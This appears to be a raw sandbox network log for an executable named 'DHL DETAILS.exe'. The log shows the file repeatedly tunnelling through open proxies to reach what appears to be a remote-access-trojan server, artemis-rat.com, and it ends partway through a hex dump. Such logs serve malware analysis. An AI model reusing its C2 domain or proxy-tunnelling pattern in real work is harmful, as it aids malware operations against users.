Mar 9, 2024 13:14:18.439804077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.777220964 CET	334	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 204 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1330	192.168.2.5	53993	45.14.174.180	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.440278053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.594495058 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1331	192.168.2.5	53984	162.159.242.109	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.442168951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.603044033 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1332	192.168.2.5	53890	184.178.172.17	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.450768948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1333	192.168.2.5	53988	143.110.232.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.453033924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.973856926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.568048000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.703658104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1334	192.168.2.5	52567	159.223.71.71	51213	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.514275074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.520834923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.520962954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646358967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1335	192.168.2.5	53920	45.196.151.97	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.514503956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.731750011 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1336	192.168.2.5	52315	128.199.196.31	57715	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.514671087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.520833015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.520967007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646352053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1337	192.168.2.5	53959	34.83.143.6	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.514698982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036418915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.855993986 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1338	192.168.2.5	53813	222.179.155.90	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.519131899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.884269953 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:11:35 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1339	192.168.2.5	52553	45.5.118.43	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.531162024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.033529997 CET	202	IN	HTTP/1.0 404 Not Found Content-Length: 715 Content-Type: text/html Date: Thu, 22 Feb 2024 15:56:55 GMT Expires: Thu, 22 Feb 2024 15:56:55 GMT Server: Mikrotik HttpProxy Proxy-Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1340	192.168.2.5	54007	104.21.66.184	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.555448055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.711312056 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1341	192.168.2.5	54010	104.23.107.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.557183981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.711661100 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1342	192.168.2.5	53865	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.602957964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1343	192.168.2.5	53926	159.203.61.169	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.607211113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.911448956 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1344	192.168.2.5	53981	154.16.116.166	2512	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.610008955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.270607948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1345	192.168.2.5	53811	202.142.159.204	31026	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.610033989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1346	192.168.2.5	54094	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.610795021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1347	192.168.2.5	52655	5.44.42.115	58386	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.610903978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1348	192.168.2.5	53854	138.36.150.16	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.619626045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1349	192.168.2.5	52636	172.93.111.87	15805	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.624571085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630197048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1350	192.168.2.5	53931	18.228.198.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.630990028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.957890987 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:18 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:18.991254091 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 99 6e f5 fb 2f 4b 37 b2 31 cf 91 2c 06 51 38 92 d3 e0 e6 25 3b 58 ad 00 b0 75 7f 65 8b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRn/K71,Q8%;Xue*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:19.321687937 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 1b c8 b7 a7 77 93 93 83 c1 dd 7b 1e 9b 61 5d 5a e3 55 ce 12 bf ec 8c a5 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9w{a]ZUDOWNGRD0000H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0H0Z~fVz'
Mar 9, 2024 13:14:19.326756954 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 ed 73 4e c2 06 3a 8d e8 a5 45 56 ae d5 39 c1 96 32 cf bd 96 be 80 08 21 da 72 1c 37 1f 0e 23 2e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 57 e5 d1 4f 40 85 1e 27 ae 32 f2 e3 b2 30 72 3f 00 61 a6 34 a1 Data Ascii: %! sN:EV92!r7#.(WO@'20r?a4Cx9M?
Mar 9, 2024 13:14:19.652370930 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 a5 33 9f 77 c7 3d fd 19 9a 79 09 5f 9b 78 90 26 7f 1a f5 f0 6a aa 79 9b fb 86 c8 e5 05 77 b1 2e 41 3b eb dc e5 3d 12 e5 Data Ascii: (3w=y_x&jyw.A;=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1351	192.168.2.5	53944	34.95.243.122	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.630990028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1352	192.168.2.5	53894	13.234.24.116	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.631658077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.016696930 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:18 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1353	192.168.2.5	53903	139.129.202.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.631767988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.021594048 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 